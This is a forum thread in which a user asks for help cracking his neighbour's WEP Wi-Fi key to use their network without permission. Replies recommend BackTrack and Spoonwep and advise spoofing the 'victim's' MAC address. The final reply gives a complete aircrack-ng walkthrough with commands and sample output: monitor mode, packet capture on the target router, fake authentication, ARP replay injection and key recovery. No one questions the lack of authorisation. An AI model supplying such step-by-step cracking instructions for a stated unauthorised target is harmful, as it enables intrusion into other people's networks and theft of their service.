Trying to crack my neighbors WEP

[Wadernater2]

hey i have been looking at this site and it shows me how to crack a WEP code. ill show the link a little later but i have to download a couple programs and downgrade the driver for the built in wireless adapter. it is a Intel Pro 3945ABG and the driver needs to support moniter mode. but the thing is if i crack the code, i will need the IP Address ranges subnet mask (which i dont think changes), default gateway, DNS Server, and WINS Server. And i was wondering if the way the guy does it on this site http://forum.aircrack-ng.org/index.php?topic=1937 will be able to provide me with this information. As of right now, i dont know why it does this but on the wireless connection it says that the key is automatically provided for me, and when i connect it says limited or no connectivity. it didnt assign network address. i was also wondering if its because the passcode, or key, is wrong. but i think DHCP isnt enabled, so i have to do it automatically. Sorry im a newbie at this stuff but ill try and provide you with some information
the router is obviously a linksys, as their network is named linksys.
on the laptop i have windows xp media center edition
the wireless card is Intel Pro 3945ABG

also i read a little about a program called Kismet. i didnt know if it is good with windows and my wireless card. but please help cause on monday im going to try what this other guy did and capture packets and shit, but if i dont get ip addresses and stuff idont think itll help
thanx

[narada]

You're probably associated with the router but not authenticated. If it's running DHCP you shouldn't need to set any static information as it will be provided for you.

Kismet is a nice little utility but I don't know if there's a Windows version. I think you'd have an easier time simply downloading BackTrack (a security audit/pen-testing Linux distro), burning the iso to a disc, and following the tutorial here.

[Wadernater2]

but i dont think the Intel Pro 3945ABG wireless card is compatible with backtrack.
but i wouldnt mind booting up the computer with linux and using a program good with linux to crack it if someone could help me. because i dont know if the software will show the ip address and all the other shit. i dont think i have any problems with getting the WEP key, but i think i need to manually configure IP and stuff, and i need to figure out what my neighbors ip and other info is so i can get on the network

[stasik]

first check if ur card is compatible with backtrack from backtrack wiki page [ http://backtrack.offensive-security.com ... L:Wireless ]. if it is compatible, u ll be able to do arp injection (need about 20 min to crack the wep). if u cant do arp injection, u ll need a longer time to collect enough IV's in order to crack the key (~ 30.000 - 50.000)= depending on the victim activity on the internet. worst case scenario u ll need about 2-3 days. i dont think u need to configure IP, coz router assign IP to the devidces (192.168.100, 192.168.101, etc). first get the key and see if u could connect to internet. if there is a mac filter on the router, u ll need to fake ur mac to the victim one (the soft to fake/change mac is present in backtrack).
there are a lot of tutorials on WEP cracking...

[fperfect]

Try with backtrack 4 pre, it might help - here is a short article on how to use it http://www.think-security.com/wireless-wep-insecurity/

[Thor]

The ath5k driver injects without patches and works with one of my Atheros cards. Someone mentioned using backtrack, the backtrack 4 beta version works with all 3 of my cards by default.

[infin8ty]

Yeah, atheros chip seems best but you could always get wireless USB adapter like Hawkins which injects for me.
Or you could boot up Backtrack from a USB and use Spoonwep [automated wep cracking].

[$k£tch]

the easiest way is if your willing to give linux a go, if so heres step by step on what to do:
boot up into your distro of linux that u have chosen, as you've got the same wireless card as me ill show u the way via ubuntu, (probably best for being user friendly) you can get it from http://www.ubuntu.com/getubuntu/download once uve downloaded it just burn it to a cd/dvd or even a usb, i found easiest on a usb :)
once this is done boot up and open up a terminal (basically it's a linux version of the windows command prompt) should be an icon looking like a black tinted window in the top right hand of the screen, once this is open type in:

sudo apt-get install aircrack-ng

this will download and install aircrack and also it comes with the correct driver that you need for the wireless card.
when this has finished installing its onto the actual crack :P

in a terminal type:
sudo airmon-ng start wlan0 (sets wireless card to monitor mode)

when you type this in it will ask you for your password you have to remember that for security reasons linux doesn't even show Astrix so it will look like you are typing nothing, once this is done you should get an outcome like this:

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
3091 NetworkManager
3109 wpa_supplicant
3115 avahi-daemon
3116 avahi-daemon


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)


if this is pretty much what u you got then proceed on, next we need to find the bssid address of the targets router
to get a list of all the wireless network in your range and also to display there wireless security such as wep, wpa etc etc to get this info type in:

sudo airodump-ng mon0

once this is working you'll need to write down the channel that the wireless network is running on and also there bssid. after you've recorded the info press ctrl and C at the same time to stop the process so that you can move on to the next step

next you need to associate you wireless card to the network this is done by:

sudo airodump-ng -w wep -c 1 --bssid 00:11:22:33:44:55 mon0

the -w is the file you want to write the packets to, you can call this what ever you want I've used the word wep due to it being small and easy to remember, the -c is the channel that your target its on and the --bssid is obviously there bssid that you recorded earlier, once this is done then it should only be focused on the targets network.

next for gathering up packets :D
open a new terminal and type:

sudo aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0

you should get a result like this:

No source MAC (-h) specified. Using the device MAC (45:23:DE:ST:H3:51)
12:06:25 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 11

12:06:25 Sending Authentication Request (Open System) [ACK]
12:06:25 Authentication successful
12:06:25 Sending Association Request [ACK]
12:06:25 Association successful :-) (AID: 1)


if you got this then move on if not it may mean you need to get closer to the network or they may be using mac address filtering if so you will need to fake you mac address to one that is one already on the network if you need to do this just shout up and ill go through it :)

next step is to speed up getting the packets as otherwise it could really take days haha

sudo aireplay-ng -3 -b 00:11:22:33:44:55 mon0

after a few minutes this will start to gather packets from the network and depending on what they are doing on the Internet will depend on how fast you will get them, in my experience you will need about 30,000 but it varies on how big the key is that your cracking, you will be able to see how many packets you have gathered if you go back to the first terminal and under the heading #data is the amount you've got.

once you have got the amount of packets needed open up a new terminal and type:

dir

this will give you a list of files that are on you computer, you will need the one that you called your file earlier it will end in -01.cap so therefore mine is wep-01.cap

once you've found this file copy the name and type in:

sudo aircrack-ng wep-01.cap

this will start processing the packets and finding out the key for you :P if you had enough packets then it will decrypt the key successfully :D just make a note of the key and boot back into your windows partition, and scan for networks and type it in for the password although you will need to remove the : for the key before you type it in.

hope this helped buz me if you get stuck :P